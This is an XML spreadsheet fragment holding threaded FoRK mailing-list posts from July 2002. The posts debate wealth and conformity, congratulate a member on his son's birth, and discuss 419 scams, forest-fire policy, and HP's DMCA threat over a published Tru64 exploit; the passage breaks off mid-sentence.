Power(over others)Basicaly we have gone back to being serfs, only we demand nicer hovels.
WE demand to have paid for a ruling class lord over us, protect us and
bascialy  build the castle walls stronger to protect us from all enemys of
the  status quo both forgien and domestic.If the constitution were allowed to go up for a vite of confiendnce todayI
bet it would fall down and go boom.. Too much freedom, too many ways that
the INdividual is called on to be thier own guardian...too many demands on
the fraility of human nature...much better to errect protectors, let them
sort it all out, and tell us what we need to do to be happy.
Smart in todays society is having enough Welath, Charm, Will, Power,
Knowing etc to Do What You Want.Stupid is living under others rules.
(to the stupid the smart are "stupid" "look at them, wasting all thier
time  on that tomfollery" "lords a goshen, aint they the queer ones"
"would you  look at that, some folks just dont have the sense to fit in")
The words Smart and Atupid are the wrong ones here... Lets change them toIndviduals  and Sheepleyea that works better for me.
tomhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 2002-07-26 at 12:49, Ian Andrew Bell wrote:
&gt; This isn't particularly well-founded logic.  What you're saying is 
&gt; that "most rich people are smart" and that the latter is causal to 
&gt; the former.  By implication, then, you would say that "most poor 
&gt; people are stupid".  This is true, statistically, because most 
&gt; people are poor and most people are also stupid.  
I never said that rich people are smart, just less stupid than most
other people.  And most people who are poor do engage in more reckless
and stupid behavior in my experience; the people that are a bit smarter
don't stay poor for long, so it is a self-selecting population.  Hell, I
grew up in as abject a poverty as you can find in the US and I remember
quite well why the people that stayed poor were poor -- it certainly
wasn't because of The Man.  And my parents were poor because they made
lots of stupid choices -- I had front row seats to the whole process. 
Unlike many others, I actually learned from the experience.And I've known a lot of wealthy people (both in a strict monetary sense
and general sense), and I can't think of a one that was a fool. People
who earned their wealth (i.e. 95+% of the wealthy in the US) didn't
manage to do so, and maintain their wealth, because they were fools.  It
isn't that these people are that much smarter, they just don't make lots
of bad decisions and stupid mistakes. Being very smart AND not making
lots of stupid mistakes is pretty much a surefire recipe for being
wealthy.
&gt; Being smart, for example, has made Stephen Hawking famous and 
&gt; respected, but he's not particularly rich.  Jennifer Lopez is by 
&gt; all accounts a complete moron.  In fact, spend a weekend in Beverly 
&gt; Hills and you will encounter vast numbers of people who are 
&gt; profoundly stupid driving Rolls Royces and shopping at PRADA.
You are using a very narrow definition of "smart".  Smart doesn't make
you rich, it gives you the *choice* to be rich. Many people (e.g.
Stephen Hawking) are quite happy merely being comfortable and devote
their energy elsewhere than being "rich".  But I don't know too many
really smart people that actually choose to live in poverty.
&gt; [...ridiculous caricature of wealthy people elided...]
&gt; At the granular level, the notion that "most rich people are rich 
&gt; because they're smart" is so anecdotal and naive that it's not 
&gt; worth arguing about, so I won't.  Still, a compelling point worth 
&gt; some clarification.
It sounds like you've bought into the absurd Hollywood depictions of
what wealthy people are like.  Hint: they are exactly like you and me,
but with a higher net worth.  In the U.S., the fact is that two-thirds
of the millionaires are blue collar folks who worked very smart and very
hard, and the vast majority of all the wealthy in the U.S. are
completely self-made (i.e. first-generation wealthy).  "Old wealth" is
incredibly rare in the U.S., as it typically comes and goes within three
generations, and the handful that you do hear about are the unusually
long-lived exceptions.It's quite simple to become wealthy in the U.S. if you put some effort
into it.  However, most people prefer to merely be comfortable and
expend a lot less energy.  Virtually all the people I know who are
wealthy are chronic workaholics with above average intelligence and
exaggerated amounts of drive.  Most people would not consider those
people's lives "fun", though those people tend to enjoy what they do.
-James Rogers
 jamesr@best.com
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On 26 Jul 2002, James Rogers wrote:--]grew up in as abject a poverty as you can find in the US and I remember
--]quite well why the people that stayed poor were poor -- it certainly
--]wasn't because of The Man.Same here. My folks were both born and raised in a blue color section of
the Bronx. I was raised in the same Apt my dad was raised in...a tiny one
bedroom place.Both my folks got educated and moved away from the lifestyle of "in da
poor trenches 4 life"
--]Unlike many others, I actually learned from the experience.Yep. I wached as my dad went for his GED then his Bachelors and so on. I
watched as both he and my mom worked hard to get out of the place they
were. Once thing it taught me, its tough work but if you havea goal then
its worth it.--]Stephen Hawking) are quite happy merely being comfortable and devote
--]their energy elsewhere than being "rich".  But I don't know too many
--]really smart people that actually choose to live in poverty.Its that language thing again. Rich is a very vast word, its like Salt. If
you put it on steak its going to taste differnt then if you season pasta
with it.--]It sounds like you've bought into the absurd Hollywood depictions of
--]what wealthy people are like.Us Vs THEM, its ages old and the power structures inately know that to
keep things goign there way folks need, NEED..heck DEMAND the US vs THEM
strugle. So its the Wealthy VS the Poor...the Smart Vs the Stupid...the
With vs the Withouts....and all the while those shmucks who go underdog
down trodden need only get out of the loop and play a differnt game.
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
Off we go to the hospitalBenjamin Wallace Higgins is on his way.-tom
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Good point, Tom.We want to be led. It's much easier to blame our leaders, throw stones at 
scapegoats, than to actually take responsibility for our actions and think 
through the consequences.At 11:14 AM 7/26/2002 -0400, Tom wrote:
&gt;On Fri, 26 Jul 2002, Tom wrote:
&gt;
&gt;--]On Thu, 25 Jul 2002, Adam L. Beberg wrote:
&gt;--]
&gt;--]--]Drains what? My wallet you mean? America _is_ greed, that's who and 
&gt;what we
&gt;--]--]are.
&gt;--]
&gt;--]You really are about as clueless as a fridge without tcp/ip.
&gt;
&gt;Before there is a jump off to some thread I cant be around to respond to
&gt;(contractions now getting closer and longer and stronger but the kids head
&gt;is still a bit off true) let me say this.
&gt;
&gt;(and this is the short rambling take on America as it stands today, so
&gt;flesh it our for me if you want)
&gt;
&gt;The problem with america is not its goverment, its companies, its
&gt;corportate raider mentality, its throw away buy a new one culture, its not
&gt;that we are greedy or shallow or over religious or under religious or even
&gt;religious in the context of a secular ruling system......
&gt;
&gt;The problem with america is its citizens, the things that make it up. We
&gt;are not greedy, we are sheep. We are easily led from one trend to the
&gt;next, we are diverted in our lives to follow any one of a number of media
&gt;induced "goals" that run us through commericalistic hoops shedding not
&gt;only our worth but our fine grain value as individuals.
&gt;
&gt;We are a nation of a million differnt parts seeking a homogony of sameness
&gt;thru right thought, right action right purcheses right hopes right dreams
&gt;right teampicking right listeningtothem right mouthingoftheessentialwords
&gt;and right sameness
&gt;
&gt;We seek to loose the individuality of our past by plunging headlong into
&gt;the lava searing melting pot to come out with all our quak spins set the
&gt;same as anyone else.
&gt;
&gt;In so doing we subvert and subject ourselves tothe "status quo" in ways
&gt;that makes Islam look  like an excersise in free will and hippy love
&gt;magic.
&gt;
&gt;We have allowed a subset of our citizens to set the pace for us, mostly
&gt;because to set the pace sets you apart and that is a bad thing in the
&gt;melting pot society. Thats why the rulers, the trend setters, the rich and
&gt;the famous are the THEM.
&gt;
&gt;We then follow that with THEY set us up to do, we run the various rat
&gt;mazes that have been constructed and call this a live, We chase the
&gt;cheese, which is green, moldy and made of paper. We climb the moutians set
&gt;up as goals. We fight the OTHERS who we are told are evil. In the end we
&gt;judge our living on how well we followed one of the mazes and how fat we
&gt;are before the slaughter.
&gt;
&gt;We are the blue collar worker, the office worker, the disability con, the
&gt;tech warrior, the homemaker, the godfearing do gooder, the celeb.
&gt;
&gt;or we are the OTHER, the dont fiters, the Trouble Makers.
&gt;
&gt;-tom
&gt;
&gt;
&gt;
&gt;http://xent.com/mailman/listinfo/forkhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">A true geek.  Runs to the puter to post before taking a laboring wife to 
the hospital.  I'd kill you.  LOL
Grats, Daddy-o!
COn Sat, 27 Jul 2002, Tom wrote:&gt; 
&gt; Off we go to the hospital
&gt; 
&gt; Benjamin Wallace Higgins is on his way.
&gt; 
&gt; -tom
&gt; 
&gt; 
&gt; http://xent.com/mailman/listinfo/fork
&gt; -- 
"My theology, briefly, is that the universe was dictated but not
          signed."  (Christopher Morley) 
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, 27 Jul 2002, CDale wrote:&gt; A true geek.  Runs to the puter to post before taking a laboring wife to
&gt; the hospital.  I'd kill you.  LOL
&gt; Grats, Daddy-o!Fear not poor Tom, between the pain &amp; endorphins and/or massive amounts of
drugs, she should remember little of the process. Her body is designed to
block out the whole event, so that she can tell other women "oh having the
baby wasnt so bad, you should have one!". Why else would any woman be
willing to EVER have sex.&gt; On Sat, 27 Jul 2002, Tom wrote:
&gt;
&gt; &gt;
&gt; &gt; Off we go to the hospital
&gt; &gt;
&gt; &gt; Benjamin Wallace Higgins is on his way.
&gt; &gt;
&gt; &gt; -tomAnd so passes into the great beyond another FoRKer. Only bagpipes could
possibly do justice to a moment like this. See you when the kids hits
preschool, which is about the next time you will be sleeping again.- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.comhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Nope, a true geek would have a Blackberry so he could give us updates *from* the hospital.Ken&gt; -----Original Message-----
&gt; From: CDale [mailto:cdale@techmonkeys.net]
&gt; Sent: Saturday, July 27, 2002 6:22 AM
&gt; 
&gt; A true geek.  Runs to the puter to post before taking a 
&gt; laboring wife to 
&gt; the hospital.  I'd kill you.  LOL
&gt; Grats, Daddy-o!
&gt; C
&gt; 
&gt; On Sat, 27 Jul 2002, Tom wrote:
&gt; 
&gt; &gt; 
&gt; &gt; Off we go to the hospital
&gt; &gt; 
&gt; &gt; Benjamin Wallace Higgins is on his way.
&gt; &gt; 
&gt; &gt; -tom
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, 27 Jul 2002, Adam L. Beberg wrote:&gt; On Sat, 27 Jul 2002, CDale wrote:
&gt; 
&gt; &gt; A true geek.  Runs to the puter to post before taking a laboring wife to
&gt; &gt; the hospital.  I'd kill you.  LOL
&gt; &gt; Grats, Daddy-o!
&gt; 
&gt; Fear not poor Tom, between the pain &amp; endorphins and/or massive amounts of
&gt; drugs, she should remember little of the process. Her body is designed to
&gt; block out the whole event, so that she can tell other women "oh having the
&gt; baby wasnt so bad, you should have one!". Why else would any woman be
&gt; willing to EVER have sex.This tells me two things: 
1. You are truly male.
2. You are a male who has a very narrow view of what sex is about.(:Chttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt; Fear not poor Tom, between the pain &amp; endorphins and/or massive
&gt;&gt; amounts of drugs, she should remember little of the process. Her body
&gt;&gt; is designed to block out the whole event, so that she can tell other
&gt;&gt; women "oh having the baby wasnt so bad, you should have one!". Why
&gt;&gt; else would any woman be willing to EVER have sex.
&gt;
&gt; This tells me two things:
&gt; 1. You are truly male.
&gt; 2. You are a male who has a very narrow view of what sex is about.
&gt;
&gt; (:
&gt;
&gt; CHaving not had a baby meself, but having listened to my mother and
countless others retell the tale, I'd reccomend to Adam a few bits of
advice:
1)  We don't generally have sex just to get preggers.   You'd never get
laid if that was the case. BUt hey, if we can convince you that the reason
women don't have sex with you adam is because they don't want to carry
your embittered, angry child, well hey.   Girls Win!
2)  Birth control.   Let me say this again because Adam has forgotten the
last 50 years (at least for the pill)  BIRTH control.
3)  For many women with men who can actually uh... satisfy, sex is great. 
 Maybe you're lacking in this department ? ;)So moral of the story:   Women, keep telling Adam that no one will have
sex with him because they don't want to get preggers with his angry,
bitter children and go through the pain of childbirth.
yea.. thats it.;)
&gt;
&gt; http://xent.com/mailman/listinfo/forkhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, 27 Jul 2002 bitbitch@magnesium.net wrote:&gt; &gt;&gt; Fear not poor Tom, between the pain &amp; endorphins and/or massive
&gt; &gt;&gt; amounts of drugs, she should remember little of the process. Her body
&gt; &gt;&gt; is designed to block out the whole event, so that she can tell other
&gt; &gt;&gt; women "oh having the baby wasnt so bad, you should have one!". Why
&gt; &gt;&gt; else would any woman be willing to EVER have sex.
&gt;
&gt; Having not had a baby meself, but having listened to my mother and
&gt; countless others retell the tale, I'd reccomend to Adam a few bits of
&gt; advice:
&gt; 1)  We don't generally have sex just to get preggers.I was of course refering to the last 100 million years or so, the last 50
are just a blip.
- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.comhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, 27 Jul 2002, CDale wrote:--]A true geek.  Runs to the puter to post before taking a laboring wife to
--]the hospital.  I'd kill you.  LOLScripts baby:)-One key and I was off.well a few more than one but well under .30 secs of
time.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
At 12:45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6 lbs 13 oz 20
 somthing inches tall and doing what all Higgins boys do best...
 feed and sleep. Mother and Child are doing great.MOre when I get teh chance. We are in the hospital for 3 days but I have a
free terminal scoped out that now has ssh on it.The first pewp...man they prep you for it but northing really can...Wowzer
that stuff is road tar.
lates-tomhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, 27 Jul 2002, David Parmet wrote:
--]
--]Unless, like mine (who made me email everybody while she was on the phone
--]with her OB), his wife is a bigger geek than he is.
--]She made me do the calls and look for a terminal and she even reminded me
to update wsmf.org. Its a geekygeek family.And I had a laptop/firewire/vidcam/modem solution all set up but she nixed
that very very harshly....-tomhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "t" == tomwhore   writes:    t&gt; The first pewp...man they prep you for it but northing really
    t&gt; can...Wowzer that stuff is road tar.First kid, eh? ;)No, there's no prep for it.  No prep for the fifth either.  If you have
any parenting guidance books, burn them now.Congratulations; kudos and regards to the mum.  It don't matter how it
happened so long as everyone's ok.Starting today, that's three lives that will never be the same.-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
Business Innovations Through Open Source Systems: http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Congratulations!!A few observations:All children are different and will generally route around whatever 
technique you learned from relatives, books, talk shows, or the last child.Just when you get good at being a parent, you're done.Don't overprotect. I always called this "First Baby Syndrome". A 
neighbor at one point had a 4 or 5 year old that would choke on jello, 
probably because she never allowed him to have solid food until he was 
far too old, IMHO. I fed mine cereal, etc., early and let them get the 
hang of it. I always want my kids to be able to handle anything if I'm 
not there so I have them try it out when I am. (Within limits of 
course.) Of course, I'm now beating up my body at Vans Skate Park trying 
to do 5ft. half pipes on speed skates with my 10 year old daughter.sdwGary Lawrence Murphy wrote:&gt;&gt;&gt;&gt;&gt;&gt;"t" == tomwhore   writes:
&gt;&gt;&gt;&gt;&gt;&gt;            
&gt;&gt;&gt;&gt;&gt;&gt;
&gt;
&gt;    t&gt; The first pewp...man they prep you for it but northing really
&gt;    t&gt; can...Wowzer that stuff is road tar.
&gt;
&gt;First kid, eh? ;)
&gt;
&gt;No, there's no prep for it.  No prep for the fifth either.  If you have
&gt;any parenting guidance books, burn them now.
&gt;
&gt;Congratulations; kudos and regards to the mum.  It don't matter how it
&gt;happened so long as everyone's ok.
&gt;
&gt;Starting today, that's three lives that will never be the same.
&gt;
&gt;  
&gt;
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Owen Byrne:
&gt;I think his beef is that the laws for personal bankruptcy are being 
&gt;rewritten without touching
&gt;corporate bankruptcy, another example of how the legal construct known as a 
&gt;"corporation"
&gt;is treated more favorably than the non-legal construct known as a "human 
&gt;being."Yeah, I get that. I just think this is a poor
example. Corporate bankruptcy is a power fight
between creditors, management, and shareholders
over control of assets. Because a corporation is
incorporeal (hee, hee), it can't be much else.If you're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http://messenger.msn.comhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On 29 Jul 2002, James Rogers wrote:&gt; On Mon, 2002-07-29 at 06:36, Russell Turpin wrote:
&gt; &gt;
&gt; &gt; Now yeah, creditors are left holding the bag when a
&gt; &gt; company goes bankrupt.
&gt;
&gt;
&gt; In my experience, it is the shareholders who are left holding the bag.Yes, the current ones, but rarely if ever the original ones. Mom and pop
investor get screwed, while the originals have inside info and have cashed
it all or enough out to not care anymore.As for the rules for a corp being different then for people, why do you
think we HAVE corporations? Tax benefits, liability benefits, and the ever
popular i didn't do it. If everything can be blamed on a
virtual "thing" then noone has to worry about having their $100M home in
florida taken away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Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.com
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">One scam to rule them all,
One scam to bind them, 
One scan to burn them all, 
And the stupidity bind them. (Yes, i'm ripping, and badly from LOTR) Alright, so NPR's All Things Considered had a wonderful story on the whole Nigerian 419 scams that seem to be running
into my inbox constantly (Thanks FoRK!) Turns out, these 419 scams (419 is the statute in Nigeria that this particular form
of fraud falls under) have actually snared a few people -- NPR reported to the tune of 100 million dollars over a few years, in the US alone.One website listed the 419 scam as being the 'third to fith largest industry in Nigeria' (1), netting billions of dollars
from around the world.   Its large enough to warrant a governmental investigation and a special number to call and report
(to the secret service, no less) scam abuse. (2)   Folks are apparently being held for ransom if they decide to go
'check out' the scam.  (3).Listen to the NPR article (4).   What's great about NPR is the commentary at the end. Turns out, this is all unbelievably
common.   The origination, at least to NPR's knowledge, starts with the scam elements being transposed from Nigeria,
to London, England.   Instead of the bereved widow of a Nigerian national, the originating con was directed to the 'heirs'
of Sir Frances Drake's estate.   If you were 'chosen' as an heir, you could contribute a portion of your money so that a
fellow heir (and scam artist) could reclaim the monetary largess in the Court of England, by proving that Elizabeth I had
nulled Sir Drake's will and taken his fortune as her own.   Oscar
Hartzell, the gent who started this scam, way back in the early 1800s,
managed to gain quite a fortune, all on the backs of idiots.   Sound familiar?A fool and his money, deserve to be parted. (1) http://home.rica.net/alphae/419coal/
(2) 'If you have received a letter, but have not lost any monies to this scheme, please fax a copy of that letter to
(202) 406-5031.'  From:  http://www.secretservice.gov/alert419.shtml  --
They also have a number for those idiots who have lost their money to this.  
(3) http://www.crimes-of-persuasion.com/Crimes/Business/nigerian.htm
(4) http://www.npr.org/ramfiles/atc/20020729.atc.12.ram  -- Go down to Nigerian 419 scams
So i'm in a wierd mood, go figure.BB
-- 
Best regards,
 bitbitch                          mailto:bitbitch@magnesium.net
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">At 12:05 AM 7/30/02 -0700, bitbitch@magnesium.net wrote:
&gt;common.   The origination, at least to NPR's knowledge, starts with the 
&gt;scam elements being transposed from Nigeria,
&gt;to London, England.   Instead of the bereved widow of a Nigerian national, 
&gt;the originating con was directed to the 'heirs'
&gt;of Sir Frances Drake's estate.   If you were 'chosen' as an heir, you 
&gt;could contribute a portion of your money so that a
&gt;fellow heir (and scam artist) could reclaim the monetary largess in the 
&gt;Court of England, by proving that Elizabeth I had
&gt;nulled Sir Drake's will and taken his fortune as her own.   Oscar
&gt;Hartzell, the gent who started this scam, way back in the early 1800s,
&gt;managed to gain quite a fortune, all on the backs of idiots.   Sound familiar?Coincidentally enough, I'm currently in the middle of a pretty good book 
about the Francis Drake scam called "Drake's Fortune" by Richard Raynor.Despite being pretty familiar with the whole 419 scam stuff (see my earlier 
FoRK post from a few months back about how the whole scam works: 
http://www.xent.com/pipermail/fork/2002-May/011928.html) I never put the 
two together as being related.Apparently, I suck at pattern matching.-Mikehttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Another one fizzles out...http://www.cnn.com/2002/TECH/space/07/29/asteroid.threat.ap/index.html
------------------------------------------------------------------------------
Asteroid impact with Earth ruled out for 2019PASADENA, California (AP) -- Astronomers said Monday they have
determined that a newly discovered, 1.2-mile-wide asteroid will miss
the Earth in 2019.[...]
------------------------------------------------------------------------------R
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Yes, and the working class deserves what it gets, ...Careful now, you're talking about
most (80%) of the country.(although perhaps it is true that in
a democracy, the people wind up with
the government which they deserve)&gt; ... I grew up in as abject a poverty as you can find in the US ...... and there is a large excluded middle
between those "in poverty" and those who
are more affluent than "working class".I don't know what poverty officially is,
but from a CA perspective, $15k income is
not going to go far.  At current interest
rates, one would probably want somewhere
around $500k* wealth to throw that amount,
which pretty much limits the non-working
class to a small, single-digit percentage
of households.  (how much overlap do we
have with the retirement cohort here?)The 2000 numbers pretty much confirm it:shows that the top 5% of incomes are mostly
two+-earner households, and the zero-earner 
households are rare above median incomes.
We are the workers' paradise.The census figured $18k as the cutoff for
lowest 5th, so with that as a poverty line,
the percentages break down as follows:work\pov.  yes  no
yes        9    72
no        11     8-Dave:::::::::::* perhaps that's not even enough:
"[Irvine] "Everyone has to take a job sometime" / NH3"
(1998 wealth data was supposedly released
in 2001, but I haven't seen it yet on the
census site.  Anyone have a pointer?):::::::::::&gt; Do you punish the whole industry due to a few bad apples?&gt;&gt;From what little I have heard, the
legislation simply says that lying
in one's public figures is not just
a matter of cheating the accounts,
but really involves stealing time
and money from one's employees and
investors.  How does not tolerating
the bad apples equate to punishing
the good ones?
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "R" == Robert Harley  writes:    R&gt; Another one fizzles out...You sound disappointed.  Don't worry, there will be lots more.-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
Business Innovations Through Open Source Systems: http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">What confuses me is, because these "scam" artists are laying out all
the contact information right out on the table, why don't the police
simply pose as recipients of the scam email and trap them?  I mean,
I get no less than a half dozen a day and they should be real easy
to corner.The only answer must be that the authorities in the countries in
question must be in on the scam, but isn't international fraud (and
kidnapping and murder if the reports I've seen on the media are true)
isn't this an Interpol thing?I mean, the perpetrators are not exactly hiding, are they?What I really don't understand is why I keep getting more of these.
Don't they know by now that I already made my millions on the first one?-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
Business Innovations Through Open Source Systems: http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
Looks like HP is using the DMCA to prevent full disclosure of
security vulnerablities. This is not a good precedent...
----- Forwarded message from Vladimir Katalov  -----From: Vladimir Katalov 
Reply-To: Vladimir Katalov 
Organization: ElcomSoft Co.Ltd.
Subject: [DMCA_Discuss] Security warning draws DMCA threat
Date: Wed, 31 Jul 2002 15:04:26 +0400
http://news.com.com/2100-1023-947325.html?tag=fd_topBy Declan McCullagh
Staff Writer, CNET News.com
July 30, 2002, 4:48 PM PTWASHINGTON--Hewlett Packard has found a new club to use to pound
researchers who unearth flaws in the company's software: the Digital
Millennium Copyright Act.Invoking both the controversial 1998 DMCA and computer crime laws, HP
has threatened to sue a team of researchers who publicized a
vulnerability in the company's Tru64 Unix operating system.In a letter sent on Monday, an HP vice president warned SnoSoft, a
loosely organized research collective, that it "could be fined up to
$500,000 and imprisoned for up to five years" for its role in
publishing information on a bug that lets an intruder take over a
Tru64 Unix system.HP's dramatic warning appears to be the first time the DMCA has been
invoked to stifle research related to computer security. Until now,
it's been used by copyright holders to pursue people who distribute
computer programs that unlock copyrighted content such as DVDs or
encrypted e-books.If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works.On July 19, a researcher at SnoSoft posted a note to
SecurityFocus.com's popular Bugtraq mailing list with a hyperlink to a
computer program letting a Tru64 user gain full administrator
privileges. The researcher, who goes by the alias "Phased," said in
the message: "Here is the warez, nothing special, but it does the
job."That public disclosure drew the ire of Kent Ferson, a vice president
in HP's Unix systems unit, who alleged in his letter on Monday that
the post violated the DMCA and the Computer Fraud and Abuse Act.[...]_______________________________________________
------------------------
http://www.anti-dmca.org
------------------------DMCA_Discuss mailing list
DMCA_Discuss@lists.microshaft.org
http://lists.microshaft.org/mailman/listinfo/dmca_discuss----- End forwarded message -----
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, Jul 31, 2002 at 10:37:31AM -0600, Marty Halvorson wrote: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Service.Boy, that is rather strange. I've always been under the impression that
the uncontrollable forest fires were the result of the Forest Service's
long-standing "10:00 A.M. policy", in place until the decision in 1963 to
switch over to "let-it-burn".The 10:00 A.M. policy was based on theories about forest management from
Europe, and wasn't as applicable to the American wilds. So, we went from a
policy of containment for 100 years to one of letting things burn unless they
directly threatened property.40 years after the end of the containment policy there is still a lot of stuff
left to burn. I can't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http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Ned Jackson Lovely wrote:
 &gt; On Wed, Jul 31, 2002 at 10:37:31AM -0600, Marty Halvorson wrote:
 &gt; &gt; A Forest Service official has stated flat out that the tree lovers 
need to
 &gt; &gt; understand their responsibility in contributing to the number of
 &gt; &gt; uncontrollable (i.e., crown fires caused by very dense tree stands and
 &gt; &gt; under growth) fires by their suits to stop any tree removal from the
 &gt; &gt; forests managed by the Forest Service.
 &gt;
 &gt; Boy, that is rather strange. I've always been under the impression that
 &gt; the uncontrollable forest fires were the result of the Forest Service's
 &gt; long-standing "10:00 A.M. policy"If you'll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policies.In other words, Forest Service projects to clean up the mess resulting from 
their previous forest management practices are prevented by tree lover 
lawsuits. &gt; 40 years after the end of the containment policy there is still a lot of 
stuff
 &gt; left to burn.Exactly, and tree lover lawsuits are preventing the removal of that 
stuff.  The result:  Fires like Cerro Grande. &gt; I can't imagine that artificially planted replacement
 &gt; forests ...There are very few replacement forests planted these days.  Those that are, 
are mostly planted on private land as commercial tree farms.Peace,Marty Halvorson
marty@halvorson.ushttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">With Mobile IP?  Ack! 8-Ohttp://ana-www.lcs.mit.edu/anaweb/PDF/PR_whitepaper_v2.pdfMB
-- 
Mark Baker, CTO, Idokorro Mobile (formerly Planetfred)
Ottawa, Ontario, CANADA.               distobj@acm.org
http://www.markbaker.ca        http://www.idokorro.com
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Okay, I'll ammend that to LIVE OLD tree saving, like the thousands of 
acres of virgin pine forest that was razed here in MS so that our military 
can practice desert warfare?  Fought it for years, lost, now there is a 
stand of trees up and down Hwy 49 that's supposed to try to hide the fact 
that a huge portion of the Desoto Ntl. Forest is gone.
COn Wed, 31 Jul 2002, Marty Halvorson wrote:&gt;  &gt; So my thanks to those who are active in:
&gt;  &gt; tree saving (okay, I help some here, but never enough)
&gt;  &gt; drug rehabilitation (-smirk-  shut up, I'm serious)
&gt;  &gt; keeping some of our freedoms intact (see tree saving)
&gt;  &gt; health care reform
&gt;  &gt; puppy dog rescue
&gt;  &gt; education (move this one to the top of the list)
&gt;  &gt; etc (lots and lots of etc)
&gt; 
&gt; I can agree with most of this list except tree saving.
&gt; 
&gt; Please understand, I'm in favor of forests.  I'm not in favor of messing 
&gt; with natural processes that forests and trees have evolved over millions of 
&gt; years.
&gt; 
&gt; Every time I look toward the west from my house I see the result of overly 
&gt; aggressive tree saving.  The Cerro Grande fire that destroyed many (200+) 
&gt; houses and an area bigger than Boston.
&gt; 
&gt; The Santa Fe watershed, which has as many as 1200 trees per acre in an area 
&gt; that if left to nature would have 30-60 trees per acre.  When the Forest 
&gt; Service attempted to cull trees in their part of the watershed, the tree 
&gt; lovers stopped the program with law suits.
&gt; 
&gt; A number of other projects have been stopped by similar suits.  For 
&gt; example, a fire south of Los Alamos that left many usable, but partially 
&gt; burned, trees standing.  The Forest Service started a project to allow 
&gt; loggers to take those trees.  Hah!  The tree lovers stopped that.  Can't 
&gt; have the loggers go into the forest even if the trees being taken are 
&gt; already burned and the roads necessary to get to the trees are already built.
&gt;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&gt; 
&gt; I am writing having survived another season of forest fires.  One that saw 
&gt; many more fires than normal because of the severe drought occurring here in 
&gt; the Southwest (even though there are still quite a few fires burning).
&gt; 
&gt; Peace,
&gt; 
&gt; Marty Halvorson
&gt; marty@halvorson.us
&gt; 
&gt; http://xent.com/mailman/listinfo/fork
&gt; -- 
"My theology, briefly, is that the universe was dictated but not
          signed."  (Christopher Morley) 
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Heh. Never mind the perfectly good desert in the southwest, right? Or is 
that area too hot for desert warfare training? I'll never understand.ECDale wrote:&gt;Okay, I'll ammend that to LIVE OLD tree saving, like the thousands of 
&gt;acres of virgin pine forest that was razed here in MS so that our military 
&gt;can practice desert warfare?  Fought it for years, lost, now there is a 
&gt;stand of trees up and down Hwy 49 that's supposed to try to hide the fact 
&gt;that a huge portion of the Desoto Ntl. Forest is gone.
&gt;
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">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out.-James Rogers
 jamesr@best.com
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Jon O. wrote:
&gt; Looks like HP is using the DMCA to prevent full disclosure of
&gt; security vulnerablities. This is not a good precedent...
&gt; [...]
&gt; &gt; WASHINGTON--Hewlett Packard has found a new club to use to pound
&gt; &gt; researchers who unearth flaws in the company's software: the Digital
&gt; &gt; Millennium Copyright Act.
&gt; &gt;
&gt; &gt; Invoking both the controversial 1998 DMCA and computer crime laws, HP
&gt; &gt; has threatened to sue a team of researchers who publicized a
&gt; &gt; vulnerability in the company's Tru64 Unix operating system.
&gt; &gt; [...]Well that exploit requires an executable stack so it won't happen on a
properly admin-ed system.  But anyway grab it if you want from any of
